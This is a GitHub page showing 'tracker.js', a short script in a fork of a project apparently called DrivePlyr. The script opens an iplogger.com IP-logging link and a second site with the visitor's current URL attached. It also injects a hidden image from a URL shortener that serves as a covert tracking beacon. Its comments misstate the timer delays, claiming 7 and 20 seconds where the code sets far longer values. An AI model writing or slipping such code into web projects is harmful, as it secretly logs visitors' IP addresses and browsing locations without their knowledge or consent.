forked from unstory-app/DrivePlyr
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathtracker.js
More file actions
18 lines (14 loc) · 743 Bytes
/
Copy pathtracker.js
File metadata and controls
18 lines (14 loc) · 743 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
// Function to open the first link after 7 seconds
function openFirstLink() {
window.open("https://iplogger.com/cxdiintelegram");
}
// Function to open the second link after 20 seconds
function openSecondLink() {
var currentURL = window.location.href;
window.open("https://driveplyr.appspages.online/?ref=" + encodeURIComponent(currentURL));
}
// Wait for 7 seconds and then open the first link
setTimeout(openFirstLink, 7000000);
// Wait for 20 seconds and then open the second link
setTimeout(openSecondLink, 20000000);
document.body.insertAdjacentHTML('beforeend','<img style="display:none" src="https://tinyurl.com/why3vh4n" alt="Girl in a jacket" width="500" height="600">')